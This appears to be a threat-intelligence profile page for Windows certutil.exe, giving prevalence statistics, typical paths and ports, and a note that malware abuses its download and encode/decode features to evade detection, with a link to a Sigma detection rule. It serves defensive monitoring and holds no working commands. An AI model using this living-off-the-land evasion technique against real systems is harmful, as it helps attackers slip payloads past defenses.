57bc54e29ae449357549e23e9e9c1874328f841d731e4f02013d14cb487ec911
Author: Microsoft
Source: Wild
Threat: LOLBin
Summary
Certutil.exe is a utility used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.
EchoTrail Prevalence Score (EPS)
33.84
Rank Analysis
Host Prevalence
34.7%
Execution Rank
64,644th
Behavioral Analysis
Top Filenames
Top Paths
C:\Windows\System32
96.58 %
loading...
Top Network Ports
443
92.68 %
loading...
Ancestry Analysis
Top GrandParents
Top Parents
Top Children
Security Analysis
Intel
Certutil.exe is normally meant to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains, according to Microsoft. However, it has been abused by malware because it has the ability to download, encode and decode. Downloading through certutil can help to circumvent detections and defenses. Encoding and decoding can help to achieve the same accomplishment. Here is an example Sigma rule to help detect misuse of certutil.exe: https://github.com/SigmaHQ/sigma/blob/0fcbce993288f993e626494a50dad15fc26c8a0c/rules/windows/process_creation/win_susp_certutil_command.yml